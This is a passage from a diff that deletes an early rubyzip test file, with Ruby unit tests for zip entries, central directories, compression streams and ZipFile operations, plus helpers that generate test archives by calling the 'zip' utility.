-  TEST_COMPRESSIONMETHOD = ZipEntry::DEFLATED
-  TEST_NAME = "entry name"
-  TEST_SIZE = 8432
-  TEST_ISDIRECTORY = false
-
-  def test_constructorAndGetters
-    entry = ZipEntry.new(TEST_ZIPFILE,
-       TEST_NAME,
-       TEST_COMMENT,
-       TEST_EXTRA,
-       TEST_COMPRESSED_SIZE,
-       TEST_CRC,
-       TEST_COMPRESSIONMETHOD,
-       TEST_SIZE)
-
-    assert_equals(TEST_COMMENT, entry.comment)
-    assert_equals(TEST_COMPRESSED_SIZE, entry.compressedSize)
-    assert_equals(TEST_CRC, entry.crc)
-    assert_equals(TEST_EXTRA, entry.extra)
-    assert_equals(TEST_COMPRESSIONMETHOD, entry.compressionMethod)
-    assert_equals(TEST_NAME, entry.name)
-    assert_equals(TEST_SIZE, entry.size)
-    assert_equals(TEST_ISDIRECTORY, entry.isDirectory)
-  end
-
-  def test_equality
-    entry1 = ZipEntry.new("file.zip", "name",  "isNotCompared", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry2 = ZipEntry.new("file.zip", "name",  "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry3 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry4 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry5 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry6 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123, 
-        ZipEntry::DEFLATED, 10000)  
-    entry7 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   10000)  
-    entry8 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   100000)  
-
-    assert_equals(entry1, entry1)
-    assert_equals(entry1, entry2)
-
-    assert(entry2 != entry3)
-    assert(entry3 != entry4)
-    assert(entry4 != entry5)
-    assert(entry5 != entry6)
-    assert(entry6 != entry7)
-    assert(entry7 != entry8)
-
-    assert(entry7 != "hello")
-    assert(entry7 != 12)
-  end
-end
-
-module IOizeString
-  attr_reader :tell
-  
-  def read(count = nil)
-    @tell ||= 0
-    count = size unless count
-    retVal = slice(@tell, count)
-    @tell += count
-    return retVal
-  end
-
-  def seek(index, offset)
-    @tell ||= 0
-    case offset
-    when IO::SEEK_END
-      newPos = size + index
-    when IO::SEEK_SET
-      newPos = index
-    when IO::SEEK_CUR
-      newPos = @tell + index
-    else
-      raise "Error in test method IOizeString::seek"
-    end
-    if (newPos < 0 || newPos >= size)
-      raise Errno::EINVAL
-    else
-      @tell=newPos
-    end
-  end
-
-  def reset
-    @tell = 0
-  end
-end
-
-class ZipLocalEntryTest < RUNIT::TestCase
-  def test_readLocalEntryHeaderOfFirstTestZipEntry
-    File.open(TestZipFile::TEST_ZIP3.zipName) {
-      |file|
-      entry = ZipEntry.readLocalEntry(file)
-      
-      assert_equal("", entry.comment)
-      # Differs from windows and unix because of CR LF
-      # assert_equal(480, entry.compressedSize)
-      # assert_equal(0x2a27930f, entry.crc)
-      # extra field is 21 bytes long
-      # probably contains some unix attrutes or something
-      # disabled: assert_equal(nil, entry.extra)
-      assert_equal(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equal(TestZipFile::TEST_ZIP3.entryNames[0], entry.name)
-      assert_equal(File.size(TestZipFile::TEST_ZIP3.entryNames[0]), entry.size)
-      assert(! entry.isDirectory)
-    }
-  end
-
-  def test_readLocalEntryFromNonZipFile
-    File.open("ziptest.rb") {
-      |file|
-      assert_equals(nil, ZipEntry.readLocalEntry(file))
-    }
-  end
-
-  def test_readLocalEntryFromTruncatedZipFile
-    zipFragment=""
-    File.open(TestZipFile::TEST_ZIP2.zipName) { |f| zipFragment = f.read(12) } # local header is at least 30 bytes
-    zipFragment.extend(IOizeString).reset
-    entry = ZipEntry.new
-    entry.readLocalEntry(zipFragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeEntry
-    entry = ZipEntry.new("file.zip", "entryName", "my little comment", 
-       "thisIsSomeExtraInformation", 100, 987654, 
-       ZipEntry::DEFLATED, 400)
-    writeToFile("localEntryHeader.bin", "centralEntryHeader.bin",  entry)
-    entryReadLocal, entryReadCentral = readFromFile("localEntryHeader.bin", "centralEntryHeader.bin")
-    compareLocalEntryHeaders(entry, entryReadLocal)
-    compareCDirEntryHeaders(entry, entryReadCentral)
-  end
-  
-  private
-  def compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.compressedSize   , entry2.compressedSize)
-    assert_equals(entry1.crc              , entry2.crc)
-    assert_equals(entry1.extra            , entry2.extra)
-    assert_equals(entry1.compressionMethod, entry2.compressionMethod)
-    assert_equals(entry1.name             , entry2.name)
-    assert_equals(entry1.size             , entry2.size)
-    assert_equals(entry1.localHeaderOffset, entry2.localHeaderOffset)
-  end
-
-  def compareCDirEntryHeaders(entry1, entry2)
-    compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.comment, entry2.comment)
-  end
-
-  def writeToFile(localFileName, centralFileName, entry)
-    File.open(localFileName,   "wb") { |f| entry.writeLocalEntry(f) }
-    File.open(centralFileName, "wb") { |f| entry.writeCDirEntry(f)  }
-  end
-
-  def readFromFile(localFileName, centralFileName)
-    localEntry = nil
-    cdirEntry  = nil
-    File.open(localFileName,   "rb") { |f| localEntry = ZipEntry.readLocalEntry(f) }
-    File.open(centralFileName, "rb") { |f| cdirEntry  = ZipEntry.readCDirEntry(f) }
-    return [localEntry, cdirEntry]
-  end
-end
-
-
-module DecompressorTests
-  # expects @refText and @decompressor
-
-  def test_readEverything
-    assert_equals(@refText, @decompressor.read)
-  end
-    
-  def test_readInChunks
-    chunkSize = 5
-    while (decompressedChunk = @decompressor.read(chunkSize))
-      assert_equals(@refText.slice!(0, chunkSize), decompressedChunk)
-    end
-    assert_equals(0, @refText.size)
-  end
-end
-
-class InflaterTest < RUNIT::TestCase
-  include DecompressorTests
-
-  def setup
-    @file = File.new("file1.txt.deflatedData", "rb")
-    @refText=""
-    File.open("file1.txt") { |f| @refText = f.read }
-    @decompressor = Inflater.new(@file)
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
-
-class PassThruDecompressorTest < RUNIT::TestCase
-  include DecompressorTests
-  TEST_FILE="file1.txt"
-  def setup
-    @file = File.new(TEST_FILE)
-    @refText=""
-    File.open(TEST_FILE) { |f| @refText = f.read }
-    @decompressor = PassThruDecompressor.new(@file, File.size(TEST_FILE))
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
- 
-module AssertEntry
-  def assertNextEntry(filename, zis)
-    assertEntry(filename, zis, zis.getNextEntry.name)
-  end
-
-  def assertEntry(filename, zis, entryName)
-    assert_equals(filename, entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  end
-
-  def assertEntryContentsForStream(filename, zis, entryName)
-    File.open(filename, "rb") {
-      |file|
-      expected = file.read
-      actual   = zis.read
-      if (expected != actual)
-  if (expected.length > 400 || actual.length > 400)
-    zipEntryFilename=entryName+".zipEntry"
-    File.open(zipEntryFilename, "wb") { |file| file << actual }
-    fail("File '#{filename}' is different from '#{zipEntryFilename}'")
-  else
-    assert_equals(expected, actual)
-  end
-      end
-    }
-  end
-
-  def AssertEntry.assertContents(filename, aString)
-    fileContents = ""
-    File.open(filename, "rb") { |f| fileContents = f.read }
-    if (fileContents != aString)
-      if (expected.length > 400 || actual.length > 400)
-  stringFile = filename + ".other"
-  File.open(stringFile, "wb") { |f| f << aString }
-  fail("File '#{filename}' is different from contents of string stored in '#{stringFile}'")
-      else
-  assert_equals(expected, actual)
-      end
-    end
-  end
-
-  def assertStreamContents(zis, testZipFile)
-    assert(zis != nil)
-    testZipFile.entryNames.each {
-      |entryName|
-      assertNextEntry(entryName, zis)
-    }
-    assert_equals(nil, zis.getNextEntry)
-  end
-
-  def assertTestZipContents(testZipFile)
-    ZipInputStream.open(testZipFile.zipName) {
-      |zis|
-      assertStreamContents(zis, testZipFile)
-    }
-  end
-
-  def assertEntryContents(zipFile, entryName, filename = entryName.to_s)
-    zis = zipFile.getInputStream(entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  ensure 
-    zis.close if zis
-  end
-end
-
-
-
-class ZipInputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  def test_new
-    zis = ZipInputStream.new(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    zis.close    
-  end
-
-  def test_openWithBlock
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    }
-  end
-
-  def test_openWithoutBlock
-    zis = ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-  end
-
-  def test_incompleteReads
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[0], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[1], entry.name)
-      assert_equals(0, entry.size)
-      assert_equals(nil, zis.gets)
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[2], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[3], entry.name)
-      assert zis.gets.length > 0
-    }
-  end
-  
-end
-
-class TestFiles
-  RANDOM_ASCII_FILE1  = "randomAscii1.txt"
-  RANDOM_ASCII_FILE2  = "randomAscii2.txt"
-  RANDOM_ASCII_FILE3  = "randomAscii3.txt"
-  RANDOM_BINARY_FILE1 = "randomBinary1.bin"
-  RANDOM_BINARY_FILE2 = "randomBinary2.bin"
-
-  EMPTY_TEST_DIR      = "emptytestdir"
-
-  ASCII_TEST_FILES  = [ RANDOM_ASCII_FILE1, RANDOM_ASCII_FILE2, RANDOM_ASCII_FILE3 ] 
-  BINARY_TEST_FILES = [ RANDOM_BINARY_FILE1, RANDOM_BINARY_FILE2 ]
-  TEST_DIRECTORIES  = [ EMPTY_TEST_DIR ]
-  TEST_FILES        = [ ASCII_TEST_FILES, BINARY_TEST_FILES, EMPTY_TEST_DIR ].flatten!
-
-  def TestFiles.createTestFiles(recreate)
-    if (recreate || 
-  ! (TEST_FILES.inject(true) { |accum, element| accum && File.exists?(element) }))
-      
-      ASCII_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomAscii(filename, 1E4 * (index+1))
-      }
-      
-      BINARY_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomBinary(filename, 1E4 * (index+1))
-      }
-
-      ensureDir(EMPTY_TEST_DIR)
-    end
-  end
-
-  private
-  def TestFiles.createRandomAscii(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand
-      end
-    }
-  end
-
-  def TestFiles.createRandomBinary(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand.to_a.pack("V")
-      end
-    }
-  end
-
-  def TestFiles.ensureDir(name) 
-    if File.exists?(name)
-      return if File.stat(name).directory?
-      File.delete(name)
-    end
-    Dir.mkdir(name)
-  end
-
-end
-
-# For representation and creation of
-# test data
-class TestZipFile
-  attr_accessor :zipName, :entryNames, :comment
-
-  def initialize(zipName, entryNames, comment = "")
-    @zipName=zipName
-    @entryNames=entryNames
-    @comment = comment
-  end
-
-  def TestZipFile.createTestZips(recreate)
-    files = Dir.entries(".")
-    if (recreate || 
-      ! (files.index(TEST_ZIP1.zipName) &&
-         files.index(TEST_ZIP2.zipName) &&
-         files.index(TEST_ZIP3.zipName) &&
-         files.index(TEST_ZIP4.zipName) &&
-         files.index("empty.txt")      &&
-         files.index("short.txt")      &&
-         files.index("longAscii.txt")  &&
-         files.index("longBinary.bin") ))
-      raise "failed to create test zip '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} ziptest.rb")
-      raise "failed to remove entry from '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} -d ziptest.rb")
-      
-      File.open("empty.txt", "w") {}
-      
-      File.open("short.txt", "w") { |file| file << "ABCDEF" }
-      ziptestTxt=""
-      File.open("ziptest.rb") { |file| ziptestTxt=file.read }
-      File.open("longAscii.txt", "w") {
-  |file|
-  while (file.tell < 1E5)
-    file << ziptestTxt
-  end
-      }
-      
-      testBinaryPattern=""
-      File.open("empty.zip") { |file| testBinaryPattern=file.read }
-      testBinaryPattern *= 4
-      
-      File.open("longBinary.bin", "wb") {
-  |file|
-  while (file.tell < 3E5)
-    file << testBinaryPattern << rand
-  end
-      }
-      raise "failed to create test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("zip #{TEST_ZIP2.zipName} #{TEST_ZIP2.entryNames.join(' ')}")
-
-      # without bash system interprets everything after echo as parameters to
-      # echo including | zip -z ...
-      raise "failed to add comment to test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("bash -c \"echo #{TEST_ZIP2.comment} | zip -z #{TEST_ZIP2.zipName}\"")
-
-      raise "failed to create test zip '#{TEST_ZIP3.zipName}'" unless 
-  system("zip #{TEST_ZIP3.zipName} #{TEST_ZIP3.entryNames.join(' ')}")
-
-      raise "failed to create test zip '#{TEST_ZIP4.zipName}'" unless 
-  system("zip #{TEST_ZIP4.zipName} #{TEST_ZIP4.entryNames.join(' ')}")
-    end
-  rescue 
-    raise $!.to_s + 
-      "\n\nziptest.rb requires the Info-ZIP program 'zip' in the path\n" +
-      "to create test data. If you don't have it you can download\n"   +
-      "the necessary test files at http://sf.net/projects/rubyzip."
-  end
-
-  TEST_ZIP1 = TestZipFile.new("empty.zip", [])
-  TEST_ZIP2 = TestZipFile.new("4entry.zip", %w{ longAscii.txt empty.txt short.txt longBinary.bin}, 
-            "my zip comment")
-  TEST_ZIP3 = TestZipFile.new("test1.zip", %w{ file1.txt })
-  TEST_ZIP4 = TestZipFile.new("zipWithDir.zip", [ "file1.txt", 
-        TestFiles::EMPTY_TEST_DIR])
-end
-
-
-class AbstractOutputStreamTest < RUNIT::TestCase
-  class TestOutputStream
-    include AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def setup
-    @outputStream = TestOutputStream.new
-
-    @origCommaSep = $,
-    @origOutputSep = $\
-  end
-
-  def teardown
-    $, = @origCommaSep
-    $\ = @origOutputSep
-  end
-
-  def test_write
-    count = @outputStream.write("a little string")
-    assert_equals("a little string", @outputStream.buffer)
-    assert_equals("a little string".length, count)
-
-    count = @outputStream.write(". a little more")
-    assert_equals("a little string. a little more", @outputStream.buffer)
-    assert_equals(". a little more".length, count)
-  end
-  
-  def test_print
-    $\ = nil # record separator set to nil
-    @outputStream.print("hello")
-    assert_equals("hello", @outputStream.buffer)
-
-    @outputStream.print(" world.")
-    assert_equals("hello world.", @outputStream.buffer)
-    
-    @outputStream.print(" You ok ",  "out ", "there?")
-    assert_equals("hello world. You ok out there?", @outputStream.buffer)
-
-    $\ = "\n"
-    @outputStream.print
-    assert_equals("hello world. You ok out there?\n", @outputStream.buffer)
-
-    @outputStream.print("I sure hope so!")
-    assert_equals("hello world. You ok out there?\nI sure hope so!\n", @outputStream.buffer)
-
-    $, = "X"
-    @outputStream.buffer = ""
-    @outputStream.print("monkey", "duck", "zebra")
-    assert_equals("monkeyXduckXzebra\n", @outputStream.buffer)
-
-    $\ = nil
-    @outputStream.buffer = ""
-    @outputStream.print(20)
-    assert_equals("20", @outputStream.buffer)
-  end
-  
-  def test_printf
-    @outputStream.printf("%d %04x", 123, 123) 
-    assert_equals("123 007b", @outputStream.buffer)
-  end
-  
-  def test_putc
-    @outputStream.putc("A")
-    assert_equals("A", @outputStream.buffer)
-    @outputStream.putc(65)
-    assert_equals("AA", @outputStream.buffer)
-  end
-
-  def test_puts
-    @outputStream.puts
-    assert_equals("\n", @outputStream.buffer)
-
-    @outputStream.puts("hello", "world")
-    assert_equals("\nhello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts("hello\n", "world\n")
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-    
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"])
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"], "bingo")
-    assert_equals("hello\nworld\nbingo\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(16, 20, 50, "hello")
-    assert_equals("16\n20\n50\nhello\n", @outputStream.buffer)
-  end
-end
-
-
-module CrcTest
-  def runCrcTest(compressorClass)
-    str = "Here's a nice little text to compute the crc for! Ho hum, it is nice nice nice nice indeed."
-    fakeOut = AbstractOutputStreamTest::TestOutputStream.new
-    
-    deflater = compressorClass.new(fakeOut)
-    deflater << str
-    assert_equals(0x919920fc, deflater.crc)
-  end
-end
-
-
-
-class PassThruCompressorTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_size
-    File.open("dummy.txt", "wb") {
-      |file|
-      compressor = PassThruCompressor.new(file)
-      
-      assert_equals(0, compressor.size)
-      
-      t1 = "hello world"
-      t2 = ""
-      t3 = "bingo"
-      
-      compressor << t1
-      assert_equals(compressor.size, t1.size)
-      
-      compressor << t2
-      assert_equals(compressor.size, t1.size + t2.size)
-      
-      compressor << t3
-      assert_equals(compressor.size, t1.size + t2.size + t3.size)
-    }
-  end
-
-  def test_crc
-    runCrcTest(PassThruCompressor)
-  end
-end
-
-class DeflaterTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_outputOperator
-    txt = loadFile("ziptest.rb")
-    deflate(txt, "deflatertest.bin")
-    inflatedTxt = inflate("deflatertest.bin")
-    assert_equals(txt, inflatedTxt)
-  end
-
-  private
-  def loadFile(fileName)
-    txt = nil
-    File.open(fileName, "rb") { |f| txt = f.read }
-  end
-
-  def deflate(data, fileName)
-    File.open(fileName, "wb") {
-      |file|
-      deflater = Deflater.new(file)
-      deflater << data
-      deflater.finish
-      assert_equals(deflater.size, data.size)
-      file << "trailing data for zlib with -MAX_WBITS"
-    }
-  end
-
-  def inflate(fileName)
-    txt = nil
-    File.open(fileName, "rb") {
-      |file|
-      inflater = Inflater.new(file)
-      txt = inflater.read
-    }
-  end
-
-  def test_crc
-    runCrcTest(Deflater)
-  end
-end
-
-class ZipOutputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "output.zip"
-
-  def test_new
-    zos = ZipOutputStream.new(TEST_ZIP.zipName)
-    zos.comment = TEST_ZIP.comment
-    writeTestZip(zos)
-    zos.close
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_open
-    ZipOutputStream.open(TEST_ZIP.zipName) {
-      |zos|
-      zos.comment = TEST_ZIP.comment
-      writeTestZip(zos)
-    }
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_writingToClosedStream
-    assertIOErrorInClosedStream { |zos| zos << "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.puts "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.write "hello world" }
-  end
-
-  def test_cannotOpenFile
-    name = TestFiles::EMPTY_TEST_DIR
-    begin
-      zos = ZipOutputStream.open(name)
-    rescue Exception
-      assert($!.kind_of?(Errno::EISDIR) || # Linux 
-       $!.kind_of?(Errno::EEXIST) || # Windows/cygwin
-       $!.kind_of?(Errno::EACCES),   # Windows
-        "Expected Errno::EISDIR (or on win/cygwin: Errno::EEXIST), but was: #{$!.type}")
-    end
-  end
-
-  def assertIOErrorInClosedStream
-    assert_exception(IOError) {
-      zos = ZipOutputStream.new("test_putOnClosedStream.zip")
-      zos.close
-      yield zos
-    }
-  end
-
-  def writeTestZip(zos)
-    TEST_ZIP.entryNames.each {
-      |entryName|
-      zos.putNextEntry(entryName)
-      File.open(entryName, "rb") { |f| zos.write(f.read) }
-    }
-  end
-end
-
-
-
-module Enumerable
-  def compareEnumerables(otherEnumerable)
-    otherAsArray = otherEnumerable.to_a
-    index=0
-    each_with_index {
-      |element, index|
-      return false unless yield(element, otherAsArray[index])
-    }
-    return index+1 == otherAsArray.size
-  end
-end
-
-
-class ZipCentralDirectoryEntryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open("testDirectory.bin", "rb") {
-      |file|
-      entry = ZipEntry.readCDirEntry(file)
-      
-      assert_equals("longAscii.txt", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(106490, entry.size)
-      assert_equals(3784, entry.compressedSize)
-      assert_equals(0xfcd1799c, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("empty.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(0, entry.size)
-      assert_equals(0, entry.compressedSize)
-      assert_equals(0x0, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("short.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(6, entry.size)
-      assert_equals(6, entry.compressedSize)
-      assert_equals(0xbb76fe69, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("longBinary.bin", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(1000024, entry.size)
-      assert_equals(70847, entry.compressedSize)
-      assert_equals(0x10da7d59, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals(nil, entry)
-# Fields that are not check by this test:
-#          version made by                 2 bytes
-#          version needed to extract       2 bytes
-#          general purpose bit flag        2 bytes
-#          last mod file time              2 bytes
-#          last mod file date              2 bytes
-#          compressed size                 4 bytes
-#          uncompressed size               4 bytes
-#          disk number start               2 bytes
-#          internal file attributes        2 bytes
-#          external file attributes        4 bytes
-#          relative offset of local header 4 bytes
-
-#          file name (variable size)
-#          extra field (variable size)
-#          file comment (variable size)
-
-    }
-  end
-
-  def test_ReadEntryFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read(12) } # cdir entry header is at least 46 bytes
-    fragment.extend(IOizeString)
-    entry = ZipEntry.new
-    entry.readCDirEntry(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-end
-
-class ZipCentralDirectoryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open(TestZipFile::TEST_ZIP2.zipName, "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.readFromStream(zipFile)
-
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames.size, cdir.size)
-      assert(cdir.compareEnumerables(TestZipFile::TEST_ZIP2.entryNames) { 
-          |cdirEntry, testEntryName|
-          cdirEntry.name == testEntryName
-        })
-      assert_equals(TestZipFile::TEST_ZIP2.comment, cdir.comment)
-    }
-  end
-
-  def test_readFromInvalidStream
-    File.open("ziptest.rb", "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.new
-      cdir.readFromStream(zipFile)
-    }
-    fail "ZipError expected!"
-  rescue ZipError
-  end
-
-  def test_ReadFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read }
-    fragment.slice!(12) # removed part of first cdir entry. eocd structure still complete
-    fragment.extend(IOizeString)
-    entry = ZipCentralDirectory.new
-    entry.readFromStream(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeToStream
-    entries = [ ZipEntry.new("file.zip", "flimse", "myComment", "somethingExtra"),
-      ZipEntry.new("file.zip", "secondEntryName"),
-      ZipEntry.new("file.zip", "lastEntry.txt", "Has a comment too") ]
-    cdir = ZipCentralDirectory.new(entries, "my zip comment")
-    File.open("cdirtest.bin", "wb") { |f| cdir.writeToStream(f) }
-    cdirReadback = ZipCentralDirectory.new
-    File.open("cdirtest.bin", "rb") { |f| cdirReadback.readFromStream(f) }
-    
-    assert_equals(cdir.entries, cdirReadback.entries)
-  end
-
-  def test_equality
-    cdir1 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir2 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir3 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    cdir4 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    assert_equals(cdir1, cdir1)
-    assert_equals(cdir1, cdir2)
-
-    assert(cdir1 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir3 !=  cdir4)
-
-    assert(cdir3 !=  "hello")
-  end
-end
-
-
-class BasicZipFileTest < RUNIT::TestCase
-  include AssertEntry
-
-  def setup
-    @zipFile = ZipFile.new(TestZipFile::TEST_ZIP2.zipName)
-    @testEntryNameIndex=0
-  end
-
-  def nextTestEntryName
-    retVal=TestZipFile::TEST_ZIP2.entryNames[@testEntryNameIndex]
-    @testEntryNameIndex+=1
-    return retVal
-  end
-    
-  def test_entries
-    assert_equals(TestZipFile::TEST_ZIP2.entryNames, @zipFile.entries.map {|e| e.name} )
-  end
-
-  def test_each
-    @zipFile.each {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_foreach
-    ZipFile.foreach(TestZipFile::TEST_ZIP2.zipName) {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStream
-    @zipFile.each {
-      |entry|
-      assertEntry(nextTestEntryName, @zipFile.getInputStream(entry), 
-      entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStreamBlock
-    fileAndEntryName = @zipFile.entries.first.name
-    @zipFile.getInputStream(fileAndEntryName) {
-      |zis|
-      assertEntryContentsForStream(fileAndEntryName, 
-           zis, 
-           fileAndEntryName)
-    }
-  end
-end
-
-class CommonZipFileFixture < RUNIT::TestCase
-  include AssertEntry
-
-  EMPTY_FILENAME = "emptyZipFile.zip"
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "4entry_copy.zip"
-
-  def setup
-    File.delete(EMPTY_FILENAME) if File.exists?(EMPTY_FILENAME)
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-  end
-end
-
-class ZipFileTest < CommonZipFileFixture
-
-  def test_createFromScratch
-    comment  = "a short comment"
-
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.comment = comment
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals(comment, zfRead.comment)
-    assert_equals(0, zfRead.entries.length)
-  end
-
-  def test_add
-    srcFile   = "ziptest.rb"
-    entryName = "newEntryName.rb" 
-    assert(File.exists? srcFile)
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.add(entryName, srcFile)
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals("", zfRead.comment)
-    assert_equals(1, zfRead.entries.length)
-    assert_equals(entryName, zfRead.entries.first.name)
-    AssertEntry.assertContents(srcFile, 
-             zfRead.getInputStream(entryName) { |zis| zis.read })
-  end
-
-  def test_addExistingEntryName
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.add(zf.entries.first.name, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_addExistingEntryNameReplace
-    gotCalled = false
-    replacedEntry = nil
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      replacedEntry = zf.entries.first.name
-      zf.add(replacedEntry, "ziptest.rb") { gotCalled = true; true }
-    }
-    assert(gotCalled)
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assertContains(zf, replacedEntry, "ziptest.rb")
-    }
-  end
-
-  def test_addDirectory
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.add(TestFiles::EMPTY_TEST_DIR, TestFiles::EMPTY_TEST_DIR)
-    }
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      dirEntry = zf.entries.detect { |e| e.name == TestFiles::EMPTY_TEST_DIR+"/" } 
-      assert(dirEntry.isDirectory)
-    }
-  end
-
-  def test_remove
-    entryToRemove, *remainingEntries = TEST_ZIP.entryNames
-
